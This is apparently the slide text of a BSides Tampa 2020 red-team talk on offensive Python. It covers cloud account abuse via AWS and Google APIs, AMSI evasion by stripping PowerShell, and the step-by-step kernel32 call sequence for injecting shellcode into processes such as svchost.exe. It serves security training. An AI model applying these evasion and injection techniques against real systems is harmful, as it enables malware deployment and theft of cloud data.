Talk Venue: BSides Tampa 2020
Speakers: Mike Felch & Joff Thyer
This talk will focus on the many different ways that a penetration tester, or Red Teamer can leverage the Python programming language during offensive operations. Python is a rich and powerful programming language which above all else allows a competent developer to very quickly write new tools that might start as a Proof of Concept, but soon become an invaluable addition to the Red Teamer's tool-belt. Having the skills to both generate new tools, and modify existing tools on the fly is critically important to agility during testing engagement. Everything from utility processing of data, network protocol, API interaction, and exploit development can be rapidly developed due to the high functionality level and intuitive nature of Python.
2. Who are we?
• Mike Felch
• Vuln Research/Exploit Dev/Reverse Engineering
• Black Hills Information Security
• Established circa ‘99 in the lost underground
• Joff Thyer
• Security Researcher, Pen Tester, Developer
• Black Hills Information Security
• Certified SANS Instructor of SEC573 - Automating Infosec with Python
3. What are we covering?
• Attacking Cloud
• AWS
• Google
• Microsoft Azure
• Writing Malware
• Evasion
• Injection
• Execution
• Ways to weaponize
• Libraries
• Tooling/Frameworks
5. Attacking Cloud: Overview
• Infrastructure AND Services
• SaaS Platforms: O365 vs G Suite
• IaaS Platforms: AWS vs Azure vs Google
• Overlooked rich attack surfaces
• Customer: “We don’t use Azure, just O365”
• Pentesters: “.. but we need DA!”
• Developers: “Oops.. I checked in my .aws folder.”
• Major providers released an SDK/API
6. Attacking Cloud: Auth Flow
Standard Auth Flow
• Creating a client
• Need authorization to authorize
• Need access token to resources
• Auth on behalf of victim
• ….
• Profit!
7. Attacking Cloud: AWS
Boto 3: The AWS SDK for Python
• Client:
• Low-level AWS access
• Maps 1:1 to AWS services
• Most (all?) operations supported
• Resource/Sessions
• CRUD-like Operations
• Enumerate all the things..
• 219 services supported!
Resource: https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/index.html
11. Attacking Cloud: Google
• API Client: pip install oauth2client
• Requires registering your app
• Save the token.json
• Auth is easier w/ logged in web session
• Cache to credentials.json
• Search files, pilfer email, and add backdoors
• GMail, GDrive, Calendar, etc
• Compute SDK(s):
• https://cloud.google.com/python/setup
Resource: https://oauth2client.readthedocs.io/en/latest/
18. Writing Python Malware
● Evasion
○ Evading AMSI: Stripping PowerShell
● Injection
○ Injecting shellcode wi/ custom Python
● Execution
○ Creating an EXE from a Python script
19. 1)Evading AMSI: PowerStrip.py
● PowerShell detection by Anti-Malware Scan Interface (AMSI)
● Can be suboptimal and annoying on a test
● Evasion?
○ Invoke-Obfuscation by Daniel Bohannon is amazing
○ But… you really don’t have to go that far.
20. PowerStrip.py
● What if we just stripped comments, and changed a few applet
names? No really… not kidding.
● https://github.com/yoda66/PowerStrip
26. 2) Python Malware
● Python has access to Windows kernel32 DLL calls through the
“ctypes” module
○ Setting up the correct kernel32 DLL calls is a painstaking process.
● You can leverage this to run a shellcode of choice.
○ msfvenom, or cobalt strike generated shellcode for example.
● There are a huge number of different process injection techniques.
● There is a lot of BAD code floating around the Internet.
27. Steps for shellcode injection
● Three fundamental steps no matter whether you are creating a
thread locally, or in remote process
○ Allocate Memory
○ Copy Shellcode to allocated memory
○ Create a running thread of code
● Notes:
○ We will not be using reflexive DLL injection which typically involves using
LoadLibraryA() from DLL on disk.
○ Remote process injection requires opening a remote process handle
○ We will not address “Process Hollowing” either.
28. Injection: Memory Allocation
● Limited number of choices of kernel32 API call
○ VirtualAlloc()
■ allocate memory within same process
○ VirtualAllocEx()
■ allocate memory in a remote process
○ HeapCreate() then HeapAlloc()
■ allocate memory from heap within same process
29. Injection: Copy shellcode
● Two basic choices
○ RtlMoveMemory()
■ for local in-process activity
○ WriteProcessMemory()
■ for remote process activity
● Note: “ctypes” under Python3 will not allow you to copy a payload
with NULL “x00” characters within it.
○ This nearly drove me nuts. As much as I hate to say it, use Python2 for now.
○ Alternative: Encode your shellcode but this has ramifications
30. Injection: Starting Thread
● Three possibilities
○ CreateThread()
■ in local process only
○ CreateRemoteThread()
■ in remote process
○ QueueUserAPC()
■ in remote process.
■ interesting variant...
31. Matching API Arg Types
● if you don’t do this, then the API calls will all assume a Windows
MFC INT type, and you will fail.
○ Make sure to use “from ctypes.wintypes import DWORD, HANDLE … “
○ This example as part of a Python Class. (yes I learned the hard way)
33. Remote Process Injection
● You first need to find a process!
● Python “psutil” module is helpful and well… “svchost.exe”
34. Remote Process Injection Steps
● OpenProcess() - open the remote process handle
● VirtualAllocEx() - allocate memory within process
● WriteProcessMemory() - write shellcode to memory
● VirtualProtectEx() - change to READ_EXECUTE only
● CreateRemoteThread() - spin up remote process thread
● VirtualFreeEx() - free Virtual Memory
● CloseHandle() - close remote process handle
35. 3) Create EXE from Script
● A number of different methods
○ PyInstaller
○ Py2EXE
○ Possibly IronPython but its maintenance is lagging
● Pyinstaller install with “pip2” for Python2
C:> pip2 --install pyinstaller
C:> pyinstaller.exe --onefile scriptname.py
● Resulting EXE will be within “dist” directory.